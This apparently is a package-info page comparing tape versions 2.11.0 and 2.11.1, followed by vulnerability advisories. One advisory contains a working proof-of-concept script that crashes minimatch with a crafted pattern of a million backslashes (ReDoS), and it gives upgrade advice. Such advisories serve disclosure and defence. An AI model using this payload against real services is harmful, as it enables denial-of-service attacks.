Tape is a TAP-producing test harness designed for Node.js and browsers, offering a straightforward and minimalist approach to JavaScript testing. Versions 2.11.0 and 2.11.1 share nearly identical characteristics, making the upgrade subtle but potentially important for stability. Both versions list the same dependencies, including essential packages like glob for file system matching, defined for concise value checking, resumer for handling streams, through for stream transformations, inherits for prototypal inheritance, deep-equal for thorough object comparison, and object-inspect for detailed object string representation. Similarly, their development dependencies like tap (another TAP tool), falafel (AST parser), and concat-stream (buffer concatenation) remain consistent.
The MIT license and repository information also remain unchanged, indicating a commitment to open-source principles and community contribution. The author, James Halliday, maintains the same contact information. The key difference lies in the release date: version 2.11.1 was published on April 2, 2014, after version 2.11.0, which was released on March 22, 2014. This suggests that version 2.11.1 likely incorporates bug fixes or minor improvements over its predecessor. While the specific changes aren't explicitly detailed in this data, developers should opt for the later version (2.11.1) to benefit from the latest refinements and potentially avoid any known issues present in 2.11.0. The focused dependency set and consistent API across these versions make Tape a reliable choice for JavaScript testing.
All the vulnerabilities related to the version 2.11.1 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.